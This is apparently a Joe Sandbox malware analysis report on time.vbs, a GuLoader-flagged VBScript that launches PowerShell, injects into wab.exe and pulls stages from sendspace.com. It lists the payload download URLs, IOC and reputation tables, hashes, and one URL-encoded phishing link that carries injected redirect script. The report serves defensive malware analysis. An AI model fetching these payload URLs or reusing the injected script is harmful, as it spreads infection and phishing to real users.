              Gather Victim Identity Information | 221 Scripting | Valid Accounts | 1 Windows Management Instrumentation | 221 Scripting | 111 Process Injection | 1 Masquerading | OS Credential Dumping | 1 Security Software Discovery | Remote Services | 1 Archive Collected Data | 11 Encrypted Channel | Exfiltration Over Other Network Medium | Abuse Accessibility Features
              Credentials | Domains | Default Accounts | 11 Command and Scripting Interpreter | 1 DLL Side-Loading | 1 DLL Side-Loading | 21 Virtualization/Sandbox Evasion | LSASS Memory | 1 Process Discovery | Remote Desktop Protocol | Data from Removable Media | 1 Ingress Tool Transfer | Exfiltration Over Bluetooth | Network Denial of Service
              Email Addresses | DNS Server | Domain Accounts | 1 Exploitation for Client Execution | Logon Script (Windows) | Logon Script (Windows) | 111 Process Injection | Security Account Manager | 21 Virtualization/Sandbox Evasion | SMB/Windows Admin Shares | Data from Network Shared Drive | 2 Non-Application Layer Protocol | Automated Exfiltration | Data Encrypted for Impact
              Employee Names | Virtual Private Server | Local Accounts | 2 PowerShell | Login Hook | Login Hook | 2 Obfuscated Files or Information | NTDS | 1 Application Window Discovery | Distributed Component Object Model | Input Capture | 13 Application Layer Protocol | Traffic Duplication | Data Destruction
              Gather Victim Network Information | Server | Cloud Accounts | Launchd | Network Logon Script | Network Logon Script | 1 Software Packing | LSA Secrets | 2 File and Directory Discovery | SSH | Keylogging | Fallback Channels | Scheduled Transfer | Data Encrypted for Impact
              Domain Properties | Botnet | Replication Through Removable Media | Scheduled Task | RC Scripts | RC Scripts | 1 DLL Side-Loading | Cached Domain Credentials | 13 System Information Discovery | VNC | GUI Input Capture | Multiband Communication | Data Transfer Size Limits | Service Stop
              Behavior Graph ID: 1446630 | Sample: time.vbs | Startdate: 23/05/2024 | Architecture: WINDOWS | Score: 100
              Sample-level DNS/IP: www.sendspace.com; fs13n4.sendspace.com; fs12n1.sendspace.com
              Sample-level signatures: Malicious sample detected (through community Yara rule); Antivirus detection for URL or domain; Yara detected GuLoader; 3 other signatures

              Process tree:
              wscript.exe (started)
                Signatures: VBScript performs obfuscated calls to suspicious functions; Suspicious powershell command line found; Wscript starts Powershell (via cmd or directly); 3 other signatures
                -> powershell.exe (started)
                   DNS/IP: fs13n4.sendspace.com 69.31.136.57, 443, 49731 GTT-BACKBONEGTTDE United States; www.sendspace.com 172.67.170.105, 443, 49730, 49739 CLOUDFLARENETUS United States
                   Signatures: Suspicious powershell command line found; Very long command line found; Found suspicious powershell code related to unpacking or dynamic code loading
                   -> powershell.exe (started)
                      Signatures: Writes to foreign memory regions; Found suspicious powershell code related to unpacking or dynamic code loading
                      -> wab.exe (started)
                         DNS/IP: fs12n1.sendspace.com 69.31.136.53, 443, 49740 GTT-BACKBONEGTTDE United States
                      -> cmd.exe (started)
                   -> conhost.exe (started)
                   -> cmd.exe (started)

Source | Detection | Scanner | Label
time.vbs | 8% | ReversingLabs | Win32.Trojan.Generic
              No Antivirus matches
              No Antivirus matches
              No Antivirus matches
Source | Detection | Scanner | Label
http://nuget.org/NuGet.exe | 0% | URL Reputation | safe
http://pesterbdd.com/images/Pester.png | 100% | URL Reputation | malware
http://www.apache.org/licenses/LICENSE-2.0.html | 0% | URL Reputation | safe
https://go.micro | 0% | URL Reputation | safe
https://contoso.com/ | 0% | URL Reputation | safe
https://nuget.org/nuget.exe | 0% | URL Reputation | safe
https://contoso.com/License | 0% | URL Reputation | safe
https://contoso.com/Icon | 0% | URL Reputation | safe
https://aka.ms/pscore68 | 0% | URL Reputation | safe
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name | 0% | URL Reputation | safe
https://fs13n4.sendspace.com/dlpro/34b20cf0440cef8a4c2d2511415a2b43/664f6da6/exw2o1/Croutons.xtp | 0% | Avira URL Cloud | safe
https://www.sendspace.com/pro/dl/exw2o1P | 0% | Avira URL Cloud | safe
https://www.sendspace.com/pro/dl/exw2o1XR | 0% | Avira URL Cloud | safe
https://fs13n4.sendspace.com | 0% | Avira URL Cloud | safe
https://fs13n4.sendspaX | 0% | Avira URL Cloud | safe
https://fs12n1.sendspace.com/dlpro/abb1ac42d6f7e317093ecbc9d7acfd44/664f6ddc/dvbcvt/TGFVxUhEOgecNvM13.bin | 0% | Avira URL Cloud | safe
http://www.sendspace.com | 0% | Avira URL Cloud | safe
https://www.sendspace.com/pro/dl/exw2o1 | 0% | Avira URL Cloud | safe
https://www.sendspace.com/pro/dl/dvbcvt | 0% | Avira URL Cloud | safe
https://go.microsoft.c | 0% | Avira URL Cloud | safe
https://github.com/Pester/Pester | 0% | Avira URL Cloud | safe
https://www.sendspace.com | 0% | Avira URL Cloud | safe
http://fs13n4.sendspace.com | 0% | Avira URL Cloud | safe

Reading note: these URLs were carved from powershell.exe memory, not observed on the wire. The nuget.org, contoso.com, pesterbdd.com, apache.org and github.com/Pester entries are manifest strings from the PowerShellGet and Pester modules that powershell.exe loaded (both manifests are listed in the PSMODULECACHE file under dropped files), so the "malware" verdict on pesterbdd.com/images/Pester.png is a reputation hit on a bundled icon URL, not a second download source; the go.microsoft.com, aka.ms and schemas.xmlsoap.org strings are ordinary PowerShell and .NET runtime strings. Entries such as https://go.micro, https://fs13n4.sendspaX and the exw2o1P / exw2o1XR variants are truncated or over-read copies of the same strings. The hosts actually contacted are the three sendspace.com names in the DNS/IP tables below, and the two dlpro URLs are the stage downloads.
Name | IP | Active | Malicious | Antivirus Detection | Reputation
fs13n4.sendspace.com | 69.31.136.57 | true | false | (none) | unknown
fs12n1.sendspace.com | 69.31.136.53 | true | false | (none) | unknown
www.sendspace.com | 172.67.170.105 | true | false | (none) | unknown
Name | Malicious | Antivirus Detection | Reputation
https://www.sendspace.com/pro/dl/exw2o1 | false | Avira URL Cloud: safe | unknown
https://www.sendspace.com/pro/dl/dvbcvt | false | Avira URL Cloud: safe | unknown
https://fs12n1.sendspace.com/dlpro/abb1ac42d6f7e317093ecbc9d7acfd44/664f6ddc/dvbcvt/TGFVxUhEOgecNvM13.bin | false | Avira URL Cloud: safe | unknown
https://fs13n4.sendspace.com/dlpro/34b20cf0440cef8a4c2d2511415a2b43/664f6da6/exw2o1/Croutons.xtp | false | Avira URL Cloud: safe | unknown
Name | Source (process, memory dump) | Malicious | Antivirus Detection | Reputation
http://nuget.org/NuGet.exe | powershell.exe, 00000001.00000002.2672896517.0000015C3E291000.00000004.00000800.00020000.00000000.sdmp; powershell.exe, 00000004.00000002.2318228321.0000000005D69000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
https://www.sendspace.com/pro/dl/exw2o1P | powershell.exe, 00000001.00000002.2531372219.0000015C2E447000.00000004.00000800.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
https://go.microsoft.c | powershell.exe, 00000001.00000002.2697536992.0000015C468F2000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
http://pesterbdd.com/images/Pester.png | powershell.exe, 00000004.00000002.2316522228.0000000004E58000.00000004.00000800.00020000.00000000.sdmp | true | URL Reputation: malware | unknown
http://www.apache.org/licenses/LICENSE-2.0.html | powershell.exe, 00000004.00000002.2316522228.0000000004E58000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
https://go.micro | powershell.exe, 00000001.00000002.2531372219.0000015C2EDAF000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
https://contoso.com/ | powershell.exe, 00000004.00000002.2318228321.0000000005D69000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
https://nuget.org/nuget.exe | powershell.exe, 00000001.00000002.2672896517.0000015C3E291000.00000004.00000800.00020000.00000000.sdmp; powershell.exe, 00000004.00000002.2318228321.0000000005D69000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
https://contoso.com/License | powershell.exe, 00000004.00000002.2318228321.0000000005D69000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
https://contoso.com/Icon | powershell.exe, 00000004.00000002.2318228321.0000000005D69000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
https://fs13n4.sendspaX | powershell.exe, 00000001.00000002.2531372219.0000015C3042D000.00000004.00000800.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
https://aka.ms/pscore68 | powershell.exe, 00000001.00000002.2531372219.0000015C2E221000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
https://www.sendspace.com/pro/dl/exw2o1XR | powershell.exe, 00000004.00000002.2316522228.0000000004E58000.00000004.00000800.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
https://fs13n4.sendspace.com | powershell.exe, 00000001.00000002.2531372219.0000015C2E75E000.00000004.00000800.00020000.00000000.sdmp; powershell.exe, 00000001.00000002.2531372219.0000015C3042D000.00000004.00000800.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name | powershell.exe, 00000001.00000002.2531372219.0000015C2E221000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
http://www.sendspace.com | powershell.exe, 00000001.00000002.2531372219.0000015C30409000.00000004.00000800.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
https://github.com/Pester/Pester | powershell.exe, 00000004.00000002.2316522228.0000000004E58000.00000004.00000800.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
https://www.sendspace.com | powershell.exe, 00000001.00000002.2531372219.0000015C2E447000.00000004.00000800.00020000.00000000.sdmp; powershell.exe, 00000001.00000002.2531372219.0000015C30250000.00000004.00000800.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
http://fs13n4.sendspace.com | powershell.exe, 00000001.00000002.2531372219.0000015C30440000.00000004.00000800.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
IP | Domain | Country | ASN | ASN Name | Malicious
172.67.170.105 | www.sendspace.com | United States | 13335 | CLOUDFLARENETUS | false
69.31.136.57 | fs13n4.sendspace.com | United States | 3257 | GTT-BACKBONEGTTDE | false
69.31.136.53 | fs12n1.sendspace.com | United States | 3257 | GTT-BACKBONEGTTDE | false
                    Joe Sandbox version:40.0.0 Tourmaline
                    Analysis ID:1446630
                    Start date and time:2024-05-23 18:23:06 +02:00
                    Joe Sandbox product:CloudBasic
                    Overall analysis duration:0h 7m 51s
                    Hypervisor based Inspection enabled:false
                    Report type:full
                    Cookbook file name:default.jbs
                    Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of new started processes analysed:11
                    Number of new started drivers analysed:0
                    Number of existing processes analysed:0
                    Number of existing drivers analysed:0
                    Number of injected processes analysed:0
                    Technologies:
                    • HCA enabled
                    • EGA enabled
                    • AMSI enabled
                    Analysis Mode:default
                    Analysis stop reason:Timeout
                    Sample name:time.vbs
                    Detection:MAL
                    Classification:mal100.troj.expl.evad.winVBS@13/9@3/3
                    EGA Information:Failed
                    HCA Information:
                    • Successful, ratio: 77%
                    • Number of executed functions: 45
                    • Number of non-executed functions: 15
                    Cookbook Comments:
                    • Found application associated with file extension: .vbs
                    • Exclude process from analysis (whitelisted): MpCmdRun.exe, WMIADAP.exe, SIHClient.exe, conhost.exe
                    • Excluded domains from analysis (whitelisted): ocsp.digicert.com, slscr.update.microsoft.com, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
                    • Execution Graph export aborted for target powershell.exe, PID 2656 because it is empty
                    • Execution Graph export aborted for target powershell.exe, PID 6536 because it is empty
• Execution Graph export aborted for target wab.exe, PID 3688 because there are no executed functions
                    • HTTPS proxy raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
• Not all processes were analyzed, report is missing behavior information
                    • Report size getting too big, too many NtCreateKey calls found.
                    • Report size getting too big, too many NtOpenFile calls found.
                    • Report size getting too big, too many NtOpenKeyEx calls found.
                    • Report size getting too big, too many NtProtectVirtualMemory calls found.
                    • Report size getting too big, too many NtQueryAttributesFile calls found.
                    • Report size getting too big, too many NtQueryValueKey calls found.
                    • VT rate limit hit for: time.vbs
Time | Type | Description
12:24:03 | API Interceptor | 149641x Sleep call for process: powershell.exe modified
Match (IP) | Associated Sample Name / URL | Detection | Threat Name
172.67.170.105 | file300un.exe | malicious | Glupteba, Mars Stealer, PureLog Stealer, Stealc, Vidar
69.31.136.57 | https://www.sendspace.com/file/dwfkjz | malicious | FormBook
69.31.136.57 | #W002UHNSOP.vbs | malicious | Unknown
69.31.136.57 | 1st_Payment_Copy.vbs | malicious | Unknown
69.31.136.57 | 1st_Payment.vbs | malicious | Revenge
69.31.136.57 | QWMSA_Payment_Invoice0939.vbs | malicious | Quasar
69.31.136.57 | QA6433_#002.vbs | malicious | njRat
69.31.136.53 | file300un.exe | malicious | Glupteba, Mars Stealer, PureLog Stealer, Stealc, Vidar
69.31.136.53 | https://www.sendspace.com/pro/dl/hg4kq5 | malicious | Unknown
69.31.136.53 | QRONSFGYUOPMWE.vbs | malicious | Unknown
69.31.136.53 | XZ22CfAOCN.exe | malicious | RedLine SmokeLoader Tofsee Vidar
69.31.136.53 | eLc127EVdf.exe | malicious | RedLine SmokeLoader Tofsee
69.31.136.53 | dHyQ66BhVK.exe | malicious | Amadey BazaLoader RedLine SmokeLoader Tofsee Vidar
69.31.136.53 | rmmLc0TLEs.exe | malicious | Amadey BazaLoader RedLine SmokeLoader Tofsee Vidar
69.31.136.53 | WBGAO0xAUv.exe | malicious | SmokeLoader Tofsee Vidar
69.31.136.53 | r5XFZVA30A.exe | malicious | Amadey BazaLoader Djvu RedLine SmokeLoader Tofsee Vidar
69.31.136.53 | 9syta0IvuY.exe | malicious | BazaLoader RedLine SmokeLoader Tofsee Vidar
Match (domain) | Associated Sample Name / URL | Detection | Threat Name | Context (IP)
www.sendspace.com | https://www.sendspace.com/pro/dl/hg4kq5 | malicious | Unknown | 172.64.104.11
www.sendspace.com | RFQ_#_1045981_-_MAA_D_Plant_Project_r01.exe.html | malicious | Unknown | 172.67.161.115
www.sendspace.com | https://www.sendspace.com/file/dwfkjz | malicious | FormBook | 104.21.91.185
www.sendspace.com | DOCUMENTS.exe.html | malicious | Unknown | 172.64.202.8
www.sendspace.com | SecuriteInfo.com.Trojan.KillProc2.9731.8373.22974.exe | malicious | GuLoader | 172.64.108.22
www.sendspace.com | RdMr3o5vB2.exe | malicious | CryptOne, Djvu, Raccoon Stealer v2, SmokeLoader, Socelars | 172.67.141.102
www.sendspace.com | New Order.exe | malicious | Oski Stealer Vidar | 172.67.141.102
www.sendspace.com | QzvyuYJlDX.exe | malicious | Unknown | 104.21.41.17
www.sendspace.com | XZ22CfAOCN.exe | malicious | RedLine SmokeLoader Tofsee Vidar | 172.64.173.34
www.sendspace.com | eLc127EVdf.exe | malicious | RedLine SmokeLoader Tofsee | 104.21.81.195
fs13n4.sendspace.com | QA6433_#002.vbs | malicious | njRat | 69.31.136.57
fs12n1.sendspace.com | QRONSFGYUOPMWE.vbs | malicious | Unknown | 69.31.136.53
fs12n1.sendspace.com | 1st_Payment_Copy.vbs | malicious | Unknown | 69.31.136.53
fs12n1.sendspace.com | QWMSA_Payment_Invoice0939.vbs | malicious | Quasar | 69.31.136.53
Match (ASN) | Associated Sample Name / URL | Detection | Threat Name | Context (IP)
GTT-BACKBONEGTTDE | http://rb.gy/pcwqse | malicious | Unknown | 69.167.127.106
GTT-BACKBONEGTTDE | http://rb.gy/707sjf | malicious | Unknown | 69.167.127.106
GTT-BACKBONEGTTDE | la.bot.arm6.elf | malicious | Unknown | 69.31.5.255
GTT-BACKBONEGTTDE | TxXQ106ErI.elf | malicious | Mirai | 208.97.218.33
GTT-BACKBONEGTTDE | 81#Uff09.exe | malicious | Unknown | 23.62.176.141
GTT-BACKBONEGTTDE | YCrL9vbZ3g.elf | malicious | Mirai | 212.222.82.254
GTT-BACKBONEGTTDE | M88FIQFvyo.elf | malicious | Mirai | 74.199.145.209
GTT-BACKBONEGTTDE | kuzen.vbs | malicious | Unknown | 23.62.176.141
GTT-BACKBONEGTTDE | JvULMWY21C.elf | malicious | Unknown | 66.227.51.92
GTT-BACKBONEGTTDE | NnS9ImJPht.elf | malicious | Unknown | 154.15.125.182
CLOUDFLARENETUS | https://neuraxpharm.eurosbiolab.eu/?__cf_chl_rt_tk=TES3LKGEhjH1G5Ym.iTFDxwaSWwxOocOm2ySKfq7pJU-1716481117-0.0.1.1-1621 | malicious | HtmlDropper, HTMLPhisher | 104.17.2.184
CLOUDFLARENETUS | http://0x00003.000375.64090/images.php?p=%31%30%30%35%32%30%30%30%30%36%33%39%22%3E%3C%2F%64%69%76%3E%3C%73%63%72%69%70%74%3E%77%69%6E%64%6F%77%5B%27%6C%6F%63%61%74%69%6F%6E%27%5D%5B%27%72%65%70%6C%61%63%65%27%5D%28%5B%27%68%74%74%70%73%3A%2F%2F%69%6D%70%75%74%65%6C%65%74%74%65%27%2C%20%27%72%2E%63%6F%6D%2F%30%2F%30%2F%30%2F%27%2C%20%27%39%65%36%37%33%38%30%34%63%65%35%37%37%30%32%34%33%32%63%30%65%31%66%65%33%61%63%33%35%38%39%62%27%2C%27/12/101/10542/964/156117/16845%27%5D%5B%27%6A%6F%69%6E%27%5D%28%27%27%29%29%2C%64%6F%63%75%6D%65%6E%74%5B%27%62%6F%64%79%27%5D%5B%27%73%74%79%6C%65%27%5D%5B%27%6F%70%61%63%69%74%79%27%5D%3D%30%78%30%3B%3C%2F%73%63%72%69%70%74%3E | malicious | Phisher | 188.114.96.3
CLOUDFLARENETUS | ELECTRONIC RECEIPT_Europait.html | malicious | HTMLPhisher | 104.17.2.184
CLOUDFLARENETUS | 30% Down Payment Slip.pdf_______________________________________________________.exe | malicious | AgentTesla | 104.26.12.205
CLOUDFLARENETUS | ordinul de cotatie.exe | malicious | AgentTesla | 172.67.74.152
CLOUDFLARENETUS | https://microsoftedge.microsoft.com/addons/detail/rocketreach-edge-extensio/ldjlhlheoidifojmfkjfijmdhlagakni | malicious | Unknown | 104.18.138.17
CLOUDFLARENETUS | PI_230524.exe | malicious | AgentTesla, GuLoader | 104.26.12.205
CLOUDFLARENETUS | https://drive.google.com/drive/folders/1Zsq5Vi6xg6khSGcx49wWM-Q7O4uJNp0w?usp=sharing | malicious | Unknown | 172.64.41.3
CLOUDFLARENETUS | http://mi.michaels.com/p/cp/d278335eb0e4f32c/c?mi_u=0b5077a2e65ed331ee5d2de857007cdfe1a618cd5fa2ea47fde9894ad456adce&mi_ecmp=Certificate_Reminder_T4&url=//sritulasifarmstays.in/wp#acctspayable@magmutual.com | malicious | HTMLPhisher | 104.21.24.120
CLOUDFLARENETUS | https://invitebowlcheckout.info/bowl | malicious | Unknown | 172.67.197.146
Match (JA3 fingerprint) | Associated Sample Name / URL | Detection | Threat Name | Context (IPs)
3b5074b1b5d032e5620f69f9f700ff0e | https://assets-fra.mkt.dynamics.com/0cc4a623-6510-ef11-9f83-002248da15fa/digitalassets/standaloneforms/6e39a88b-9710-ef11-9f89-002248d9c773 | malicious | Outlook Phishing, HTMLPhisher | 172.67.170.105, 69.31.136.57
3b5074b1b5d032e5620f69f9f700ff0e | 30% Down Payment Slip.pdf_______________________________________________________.exe | malicious | AgentTesla | 172.67.170.105, 69.31.136.57
3b5074b1b5d032e5620f69f9f700ff0e | ordinul de cotatie.exe | malicious | AgentTesla | 172.67.170.105, 69.31.136.57
3b5074b1b5d032e5620f69f9f700ff0e | PI_230524.exe | malicious | AgentTesla, GuLoader | 172.67.170.105, 69.31.136.57
3b5074b1b5d032e5620f69f9f700ff0e | phish_alert_sp2_2.0.0.0-214.eml | malicious | Unknown | 172.67.170.105, 69.31.136.57
3b5074b1b5d032e5620f69f9f700ff0e | https://mydhl.express.dhl$tracking_link/ | malicious | Unknown | 172.67.170.105, 69.31.136.57
3b5074b1b5d032e5620f69f9f700ff0e | https://github.com/ustaxes/UsTaxes/files/15378217/All.2023.Tax.Documents.zip | malicious | Unknown | 172.67.170.105, 69.31.136.57
3b5074b1b5d032e5620f69f9f700ff0e | https://one.acme.si/sagecn/fr.html | malicious | Unknown | 172.67.170.105, 69.31.136.57
3b5074b1b5d032e5620f69f9f700ff0e | https://organic.mushroomstrade%5B.%5Dcom/?aNqBNW=Nm&rd_DyKZBUOXd0TNevGZu3_F7iSKU5CUSZG11cnJheUBtZXJjaGFudHNjYXBpdGFsLmNvbQ== | malicious | Unknown | 172.67.170.105, 69.31.136.57
3b5074b1b5d032e5620f69f9f700ff0e | SecuriteInfo.com.Trojan.PackedNET.2595.1466.2669.exe | malicious | AsyncRAT, DcRat, StormKitty, VenomRAT | 172.67.170.105, 69.31.136.57
37f463bf4616ecd445d4a1937da06e19 | PI_230524.exe | malicious | AgentTesla, GuLoader | 172.67.170.105, 69.31.136.53
37f463bf4616ecd445d4a1937da06e19 | doc023571961504.bat.exe | malicious | AgentTesla, GuLoader | 172.67.170.105, 69.31.136.53
37f463bf4616ecd445d4a1937da06e19 | Clear.7z | malicious | Unknown | 172.67.170.105, 69.31.136.53
37f463bf4616ecd445d4a1937da06e19 | SwiftCopy_23052024.exe | malicious | FormBook, GuLoader | 172.67.170.105, 69.31.136.53
37f463bf4616ecd445d4a1937da06e19 | ShippingDoc_23052024.exe | malicious | FormBook, GuLoader | 172.67.170.105, 69.31.136.53
37f463bf4616ecd445d4a1937da06e19 | rPurchaseOrderPO05232024.exe | malicious | AgentTesla, GuLoader | 172.67.170.105, 69.31.136.53
37f463bf4616ecd445d4a1937da06e19 | Forfaldendes253.exe | malicious | FormBook, GuLoader | 172.67.170.105, 69.31.136.53
37f463bf4616ecd445d4a1937da06e19 | msimg32.dll | malicious | Remcos | 172.67.170.105, 69.31.136.53
37f463bf4616ecd445d4a1937da06e19 | INVOICE.js | malicious | AgentTesla | 172.67.170.105, 69.31.136.53
37f463bf4616ecd445d4a1937da06e19 | ORDER_245230978.pdf.js | malicious | ADWIND | 172.67.170.105, 69.31.136.53
                                                      No context
                                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                      File Type:data
                                                      Category:modified
                                                      Size (bytes):11608
                                                      Entropy (8bit):4.8908305915084105
                                                      Encrypted:false
                                                      SSDEEP:192:6xoe5qpOZxoe54ib4ZVsm5emd5VFn3eGOVpN6K3bkkjo5xgkjDt4iWN3yBGHVQ9R:9rib4Z1VoGIpN6KQkj2qkjh4iUxsT6YP
                                                      MD5:DD89E182EEC1B964E2EEFE5F8889DCD7
                                                      SHA1:326A3754A1334C32056811411E0C5C96F8BFBBEE
                                                      SHA-256:383ABA2B62EA69A1AA28F0522BCFB0A19F82B15FCC047105B952950FF8B52C63
                                                      SHA-512:B9AFE64D8558860B0CB8BC0FA676008E74F983C4845895E5444DD776A42B584ECE0BB1612D8F97EE631B064F08CF5B2C7622D58A3EF8EF89D199F2ACAEFA8B52
                                                      Malicious:false
                                                      Reputation:moderate, very likely benign file
                                                      Preview:PSMODULECACHE......)..z..S...C:\Program Files\WindowsPowerShell\Modules\PowerShellGet\1.0.0.1\PowerShellGet.psd1........Uninstall-Module........inmo........fimo........Install-Module........New-ScriptFileInfo........Publish-Module........Install-Script........Update-Script........Find-Command........Update-ModuleManifest........Find-DscResource........Save-Module........Save-Script........upmo........Uninstall-Script........Get-InstalledScript........Update-Module........Register-PSRepository........Find-Script........Unregister-PSRepository........pumo........Test-ScriptFileInfo........Update-ScriptFileInfo........Set-PSRepository........Get-PSRepository........Get-InstalledModule........Find-Module........Find-RoleCapability........Publish-Script.........&ug.z..C...C:\Program Files\WindowsPowerShell\Modules\Pester\3.4.0\Pester.psd1........Describe........Get-TestDriveItem........New-Fixture........In........Invoke-Mock........InModuleScope........Mock........SafeGetCommand........Af
                                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                      File Type:data
                                                      Category:dropped
                                                      Size (bytes):64
                                                      Entropy (8bit):1.1940658735648508
                                                      Encrypted:false
                                                      SSDEEP:3:Nlllulbnolz:NllUc
                                                      MD5:F23953D4A58E404FCB67ADD0C45EB27A
                                                      SHA1:2D75B5CACF2916C66E440F19F6B3B21DFD289340
                                                      SHA-256:16F994BFB26D529E4C28ED21C6EE36D4AFEAE01CEEB1601E85E0E7FDFF4EFA8B
                                                      SHA-512:B90BFEC26910A590A367E8356A20F32A65DB41C6C62D79CA0DDCC8D95C14EB48138DEC6B992A6E5C7B35CFF643063012462DA3E747B2AA15721FE2ECCE02C044
                                                      Malicious:false
                                                      Reputation:moderate, very likely benign file
                                                      Preview:@...e................................................@..........
                                                      Process:C:\Program Files (x86)\Windows Mail\wab.exe
                                                      File Type:data
                                                      Category:dropped
                                                      Size (bytes):475136
                                                      Entropy (8bit):6.119576160135665
                                                      Encrypted:false
                                                      SSDEEP:12288:S8Tx5KRZ18xtSP+szdcIugOO50MMEMOk7:SdmxtSP+sJ+O5FWP7
                                                      MD5:72AD21D191B58842334D32A381EA7FA8
                                                      SHA1:F7375F09855A7BCE9F7A152C75E84AAC69CAF828
                                                      SHA-256:87ABFAB7BF5E213FC9E63C7FA39EDFA6452EB5F7FDD668CD370D9CF4EA3EF729
                                                      SHA-512:78662231C7CE0D03374B69DFD32614786DC5BF0C8AD2BAADF2143F42BB03BD378632CC457DC414AA7E3D284674CC9151C39F90D71D9A5DD15DBA689B2283386D
                                                      Malicious:false
                                                      Preview:.g..N..#cr.Y...N[....E)..qR..B....?..:.\...q|.E'=....T5..X.<:r.go.f./...T.....0~a.#Xt8vG#B~.i..d.@n<...M.._.^...M%.s...D.....f..#....0......&.Am5....u.H3.w.2m....[..SsP\...!K..W...DYF!.O......8L....6.d.=SG.=.........3..Ux....Xr.Tj@.f...n....QFT .g.2C^...{...P.f...ba..M"..iU.....d..p...Z..9._...7.<......hC>.....aM....BZ..08..;."..=........<_!.}.....+.........F\......Q.tX..I]L....>.1..Q..<......f`.g.M.N.........!..!_...Q./.."yZ."[.yw.[...Mq-..G......?......./..#.{k...9>....LI?.A.I/......1...&.p..Vp..l..q..oO.st.R...f..._......?..d...........BR.......2&.....q1.z...x.\.V...J.M..0....,.y...GH./4o..;M...z.....qq..U.....n.....Pw.G.)9..........b...w.l...aJAV..o..../..Yg..l.h..PT>...i].i.JGkA/....X^..j..R.5.)...tA.k3..e.s|.,....),./......%..G(.(P.E.....B....6....)J#!....*1.>..#.h..d......vE9.......[[.0.....w......lJ....nE.h....E].6..,..B.%..#.B.:...X.g+^{O.r...u.......c.D.;.6=.?.u.6S....f.I..j...l.s.....%N.H.{..dW..).L.....d...!.....&......oR
                                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                      File Type:ASCII text, with no line terminators
                                                      Category:dropped
                                                      Size (bytes):60
                                                      Entropy (8bit):4.038920595031593
                                                      Encrypted:false
                                                      SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                      MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                      SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                      SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                      SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                      Malicious:false
                                                      Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                      File Type:ASCII text, with no line terminators
                                                      Category:dropped
                                                      Size (bytes):60
                                                      Entropy (8bit):4.038920595031593
                                                      Encrypted:false
                                                      SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                      MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                      SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                      SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                      SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                      Malicious:false
                                                      Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                      Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                      File Type:ASCII text, with no line terminators
                                                      Category:dropped
                                                      Size (bytes):60
                                                      Entropy (8bit):4.038920595031593
                                                      Encrypted:false
                                                      SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                      MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                      SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                      SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                      SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                      Malicious:false
                                                      Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                      Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                      File Type:ASCII text, with no line terminators
                                                      Category:dropped
                                                      Size (bytes):60
                                                      Entropy (8bit):4.038920595031593
                                                      Encrypted:false
                                                      SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                      MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                      SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                      SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
